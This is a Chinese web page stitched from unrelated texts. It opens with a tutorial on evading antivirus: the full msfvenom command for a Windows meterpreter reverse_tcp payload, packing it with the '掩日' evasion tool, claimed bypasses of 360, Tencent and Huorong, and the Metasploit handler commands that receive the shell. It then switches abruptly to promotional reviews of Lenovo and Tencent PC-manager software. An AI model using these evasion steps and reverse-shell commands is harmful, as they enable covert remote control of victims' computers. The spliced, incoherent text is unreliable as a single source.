前言
 
分享一个傻瓜式直接套用大佬的框架进行shellcode免杀，自己还是萌新还需要学习很多东西，大佬们不喜勿喷
 
杀毒原理
 
360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等，这几个杀毒软件领头羊，现在的杀毒软件都无法脱离三个部分，扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用，最主要的还是扫描器的速度、准确率以及病毒库是否庞大。
 
1.基于特征码的静态扫描技术
 这种技术很容易被人想到，所以第一代的杀毒软件出现了，他们的杀毒思想就是，我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今病毒技术迅猛发展的形势下已经起不到很好的作用了。
 
2.启发式扫描
 为了对付病毒的不断变化和对未知病毒的研究，启发式扫描方式出现了。启发式扫描是通过分析指令出现的顺序，或特定组合情况等常见病毒的标准特征来判断文件是否感染未知病毒。
 
可以根据扫描特定的行为或多种行为的组合来判断一个程序是否是病毒。例如，制定一套打分机制，在系统目录下释放文件得20分，对分区进行格式化得100分，对启动项进行操作得50分等，只要评分达到某个预设值，即可判断为病毒文件。
 
3.虚拟机技术
 查毒引擎中的虚拟机，并不是像VMWare的工作原理那样，为待查的可执行程序创建一个虚拟的执行环境，提供它可能用到的一切元素，包括硬盘，端口等，让它在其上自由发挥，最后根据其行为来判定是否为病毒。
 
设计虚拟机查毒的目的，就是为了对付加密变形病毒，虚拟机首先从文件中确定并读取病毒入口处代码，然后以上述工作步骤解释执行病毒头部的解密段（Decryptor），最后在执行完的结果（解密后的病毒体明文）中查找病毒的特征码。
 
免杀技术
 
1.修改特征码
 既然杀毒软件在最开始时，使用了病毒特征码概念，那么我们可以通过修改病毒特征码的方式躲过杀软扫描。
 
第一种是更改特征码，例如：一个文件在某一个地址内有 “灰鸽子上线成功” 这么一句话，表明它就是木马，只要将相应地址内的那句话改成别的就可以了。
 
第二种是根据校验和查杀技术提出的免杀思想，如果一个文件某个特定区域的校验和符合病毒库中的特征，那么反病毒软件就会报警。如果想阻止反病毒软件报警，只要对病毒的特定区域进行一定的更改，就会使这一区域的校验和改变，从而达到欺骗反病毒软件的目的。
 
2.花指令免杀
 花指令免杀是指，在程序shellcode或特征代码区域增添垃圾指令，这些指令没有实际含义，不会改变程序运行逻辑，但可以阻止反编译，现在杀软在检测特征码时，都会存在偏移范围，当我们使用花指令对特征码区域进行大量填充，这样就可以实现躲避杀软的特性。
 
3.加壳免杀
 加壳，程序加壳可以很好的躲避匹配特征码查杀方式，加密壳基本上可以把特征码全部掩盖。这里说的壳指加密壳，一些普通压缩壳，并不能起到改变特征码的效果，例如：UPX、ASPack等。
 
现在杀软会在检测到文件采用加密壳之后，直接提醒用户，该文件存在问题。可以使用不常见加密壳对程序进行加壳，来躲避杀软，该方法理论可用，只通过加壳实现免杀，成功几率很小，现在基于虚拟机技术，内存监测技术的发展，通过加壳方式进行免杀的思路越来越窄。
 
4.二次编译
 msfvenom提供了多种格式的payload和encoder，生成的shellcode也为二次加工提供了很大便利，但是也被各大厂商盯得死死的。
 
而shikata_ga_nai是msf中唯一的评价是excellent的编码器，这种多态编码技术使得每次生成的攻击载荷文件是不一样的，编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。
 
目前msfvenom的encoder特征基本都进入了杀软的漏洞库。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。
 
借鉴KeePassX大佬的文章：https://www.freebuf.com/articles/web/271271.html
 
Shellcode免杀测试
 
测试需要用到：攻击机kali、掩日3.0、虚拟机win10系统
 
掩日3.0下载安装：https://github.com/1y0n/AV_Evasion_Tool
需要3.x 依赖：
1.64位 Windows 7、8、10 操作系统
2. .net framework 4.0 或更高版本 (Windows 自带)
3. tdm-gcc
 
启动MSF使用msfvenom生成一个shellcode.c文件出来
 
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=6666 -f c > /root/sheelcode.c
 
得到的shellcode.c如下
 
 然后我们使用掩日3.0进行傻瓜式免杀
 
 
 生成好之后我们先试试各大杀毒平台的静态杀毒扫描检测
 
1.火绒
 
 2.腾讯管家
 
 3.360安全卫士
 
 
以上检测360安全卫士、火绒安全、腾讯管家成功bypass
 
然后我们运行msf平台监听木马试试各大平台的杀毒动态检测
 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.130
set lport 6666
run
 

 
 直接上线没有拦截、检测到，最后总结：害，有免杀总比没有好，哈哈哈哈哈QAQ

 

 

  
 
 
 在当前的PC领域，联想近几年以来一直是市场销量冠军。而从联想官方渠道购买的新电脑自然都预先安装了联想电脑管家，因此使用联想电脑管家的用户数目也是极庞大的。这款面世四五年的电脑安全软件自然使更老牌的某某安全卫士和某管家有了很大压力。但是大家都知道有些电脑安全软件自带众多的家族式捆绑软件和广告，且会时不时的自动下载安装各类插件和APP，总让你防不胜防。在这情况下，联想电脑管家简直就是市场上的一股清泉，当然也会有部分用户会担心联想电脑管家因为更年轻而是不是功能不够强大？最近也看了不少网友的问题，比如“电脑用什么安全软件好”、“联想电脑管家好不好用”、“买了新联想电脑后要不要卸载联想电脑管家"等等类似问题。在此我先总结一下：如果是联想电脑更推荐用联想电脑管家，可以说用联想电脑管家是刚需，最佳安全软件。如果非联想电脑，也可以使用联想电脑管家。
 
用联想电脑管家的无非以下情况：1. 习惯用管家类软件，联想电脑管家可以说是无可替代。联想电脑管家简洁、无广告、无家族式软件,加上弹窗拦截功能，可以拦截其它应用带来的弹窗广告。2. 如果喜欢单纯的杀毒软件，火绒或者Windows defender会更适合你。联想电脑管家也带有杀毒功能。3. 如果是电脑小白，联想电脑管家就必须装了，有问题可以方便快捷的联系在线专家，工程师为你解决问题 。还有官方驱动可以检测更新。4. 如果是ThinkPad、拯救者、YOGA系列、联想电脑管家也是必装，定制功能第三方软件没有。5. 如果你想在电脑上畅玩手机APP，那联想电脑管家自带的软件商店模拟器就可以解忧。直接在电脑上下载安装各种安卓应用，大屏体验更刺激。6. 如果你想电脑每天都有不同的壁纸，那么使用联想电脑管家可以每天都有新的精美锁屏壁纸，以后还会有每天不同的桌面壁纸。
 

 

  
 
 
联想电脑管家当前形态科普：
 
联想电脑管家自2016年诞生以来，经过不断的迭代更新优化改进。目前已经更新至3.0版本，界面变得更简洁，功能则更强了，同时用过早期2.0版本的都知道，联想电脑管家为了杜绝广告弹窗，连自已的开机开怀提醒都取消了。并且在原2.0版本的基础上，推出应用权限管理,通过对软件⼴告拦截、软件⾃启项、推⼴软件安装、添加右键菜单进⾏⽣态治理，从而净化电脑使⽤环境。对Windows软件消息进行统一的AI智能消息管理；对应用权限统一的管理，比如软件弹窗、软件捆绑安装、软件自启、添加任务栏图标、生成桌面图标，添加右键菜单等。从⽽构建纯净的Windows⽣态环境。因此，联想电脑管家已经真正做到了，拒绝捆绑、拒绝弹窗广告，是安全行业里面唯一的一个绝对纯净、干净的电脑管家软件。
 

 

  
 
 
各版本联想电脑管家特色功能介绍：
 
联想电脑管家通用版本，也有病毒查杀、垃圾清理、一键体检、优化加速、在线客服、驱动管理、弹窗拦截等功能。并针对联想拯救者游戏类PC，联想电脑管家拯救者定制版新增了散热模式、灯效模式、显卡切换、CPU/内存超频等功能。散热模式配合联想独创的Fn+Q键快速切换，平衡模式、野兽模式、安静模式。
 

 

  
 
 

 

  
 
 

 

  
 
 
ThinkPad机型定制版的联想电脑管家，新增了F1至F12功能键设置、“小红点”的各项参数设置、设置USB关机供电的功能开关等特色功能。之前打开或者关闭USB关机供电必须要进BIOS来设置，非常繁琐，很多用户根本找不到地方，但是从联想电脑管家ThinkPad定制版上设置，就非常简单便捷。还有方便用户设置触屏使用的功能等。
 

 

  
 
 

 

  
 
 

 

  
 
 
YOGA定制版的联想电脑管家与通用版的较相近，但增加了智能散热功能。
 

 

  
 
 
总结：联想电脑管家是一款专业的电脑安全软件，虽然还算年轻，但它的背后是一群不断拼博的联想人在不断的对它优化、升级，使得联想电脑管家越来越成熟好用。目前联想电脑管家已经成为一款真正从用户角度出发，为用户着想的电脑安全软件，它无广告、拦截弹窗、无家庭式捆绑软件、并拥有众多特色功能设置。一款纯净的，适合你的电脑安全软件，选择联想电脑管家就对了。

 
我一直在用腾讯电脑管家是杀毒加管理二合一的安全软件，全方位保障用户上网安全。首次参加AVC测评即获性能最佳评级。是中国的首款二合一反病毒软件，安全管家。占内存小，杀毒好，防护好。
电脑管家下载链接
电脑管家是腾讯公司推出的一款免费安全软件，拥有云查杀***，系统加速，漏洞修复，实时防护，网速保护，电脑诊所，健康小助手，桌面整理，文档保护等功能。不仅如此，电脑管家还有敲诈者病毒急救、文档时光机、误删除文档找回等功能，而且在垃圾清理，软件管理功能也是非常强大的，里面还有小火箭，电脑如果出现卡顿你就可以点击那个小火箭进行一键优化和加速等功能，还可以等上自己的qq账号，这么好的系统安全软件，还不快来下载嘛！
 
 
腾讯电脑管家特色
 
 
1、全新设计，大小随心
小界面轻巧便捷，简单易用零思考；大界面经典专业，电脑信息全掌握；
2、专业守护，上网安心
全球最大安全云库、全新升级杀毒引擎；独有QQ帐号防御体系；全面净化互联网雾霾，还你一个清亮的上网环境；
3、极致清理，流畅如新
深度清理电脑垃圾、冗余文件；小火箭全场景一键加速，让电脑重回巅峰状态；
4、简约方便，工具自定义工具箱
支持小工具自定义，常用功能一触即达；微信聊天备份、清理文件，更多贴心小工具等你一探究竟；
 
 
腾讯电脑管家功能
 
 
1、安全防护：杀毒、漏洞全方位护航
权威评测屡获认证，***大赛荣耀加冕安全我们更专业
2、垃圾清理：极致清理，流畅如新
炫酷清理界面，强大清理实力，电脑流畅如新
3、电脑加速：一键加速，游戏快人一步
开机加速、游戏加速、小火箭加速，全方位加速体验带你飞
4、软件管理：软件升级、卸载、拦截轻松搞定
拥有软件升级、卸载、拦截等多种能力，让软件问题变得简单
5、工具箱:集合众多电脑实用工具
测试网速、免费wifi、ARP防火墙，更多强大易用工具就在工具箱
 
 
更新日志
 
 
v12.13
功能新特性：【软件管理】检测恶意软件并提醒卸载
【工具箱】工具箱新增文档保护分类
【文件恢复工具】文件恢复工具升级至3.0版本
【病毒查杀】全面查杀异鬼Ⅱ顽固病毒
 
转载于:https://blog.51cto.com/14070526/2318562

 
前言
 
在这个互联网时代，安全，智能，便捷成为了衡量一款产品是否能够提升消费者体验的高频关键词。
 
对于PC用户而言，一款管理电脑的软件应用必不可少，而作为全球化巨头企业的联想在整合硬件、软件、服务提升用户体验的初衷下，也推出了最新的联想电脑管家，以帮助用户更加简单的管理自己的电脑，从而最大化提升PC的使用体验。
 
我手中的这台笔记本电脑是今年的拯救者R7000 2020款，所以今天我们就围绕我电脑上的联想电脑管家来讲一讲。
 
用户界面
 
现在我是用的是已经升级的3.0版本，相比于之前的2.8版本，该版本用户界面变得简洁、鲜明又小清新。联想电脑管家的程序主界面，共有我的电脑、清理加速、病毒查杀、原厂驱动、我的客服、工具箱、软件商店共七大功能，同时用户可使用联想账号登陆。
 

 

  
 
 
 
功能性
 
接下来，我再讲一讲联想电脑管家的各项功能。
 
一、我的电脑
 
在这个界面里，我们可以查看清楚的了解到我们电脑的硬件详情，免去了还得下载鲁大师等类似的第三方软件的操作，这里可以简单的看一下。
 

 

  
 
 
 
是不是很清晰呀？在这里，可以查看到电脑上各个主要部件的详情，极其方便。
 
二、清理加速
 
垃圾清理这一块，操作起来简简单单，点一下扫描垃圾，即可开始扫描，等待片刻，然后就可以愉快地一键清理啦！当然，在这里也可以单独调整开机加速、运行加速，方便用户对个别应用进行选择性地作调整。
 

 

  
 
 
 

 

  
 
 
 

 

  
 
 
 
三、病毒查杀
 
在病毒查杀页面，可以选择快速扫描和全盘扫描以及自定义扫描，方便用户不同的需求，同时联想电脑管家的合作伙伴是火绒，所以自身的病毒防御检测及病毒查杀功能，足够普通用户的日常使用。
 

 

  
 
 
 
四、原厂驱动
 
我觉得这个功能，对于联想电脑，特别友好，在这里可以方便快捷的更新驱动、备份驱动、以及还原驱动，还有就是，这里的驱动全都是官方原厂的驱动，既免去下载第三方驱动软件，又极大地减小了驱动不兼容机器的几率，好评！
 

 

  
 
 
 
五、我的客服
 
我个人使用的感受就是，找客服极其方便，要是在电脑使用过程中有什么问题，可以来这里咨询，在机器人小乐的帮助下，你可以轻松找到解决问题的办法，如果还有不懂的地方，你在这里还可以直接联系工程师，与工程师直接交流。
 

 

  
 
 
 

 

  
 
 
 
六、工具箱
 
当我第一次打开工具箱的时候，被里面的小工具都“惊”到了，各式常用的小工具一应俱全，既方便又实用。
 

 

  
 
 
 
这里特别说一下软件弹窗拦截，针对各种软件的广告弹窗零容忍，若有漏网之鱼，还可以进行手动拦截，这样的话，就可以给用户一个安静的使用环境。
 

 

  
 
 
 
还有就是前不久刚刚上线的应用权限管理，在这里可以清楚的看到每个应用所有的权限，以及权限的使用记录，而我们自己也可以对应用的权限进行管理，这个小工具的出现，使得我们对应用权限的管理方便了不少。
 

 

  
 
 
 
七、软件商店
 
顾名思义，就是下载应用软件的地方，点击一下，它会跳转到一个新的界面，即联想软件商店。
 
在商店的首页，我们可以看到，这里面的应用种类还是比较全面的，应有尽有，平时我们使用的软件，完全可以在这里下载就行了，这样的话，就避免了从网站上下载可能会感染病毒的风险。
 
我记得在左侧还有安卓专区（ps:可能是因为我重装了系统的原因吧，今天它竟然悄悄藏起来了），因为其自带安卓融合引擎，所以可以直接把安卓应用安装到电脑上了，省去了下载模拟器的麻烦。
 

 

  
 
 
 
总结
 
作为电脑小白的我，并不是太懂测评，可能还有什么做的不太周到的地方，欢迎大家指正，所以我对联想电脑管家的七大功能使用体验分享，今天就先到这里，如果大家也觉得不错的话，就麻烦你给我点一个小小赞同，谢谢，爱你们，么么哒！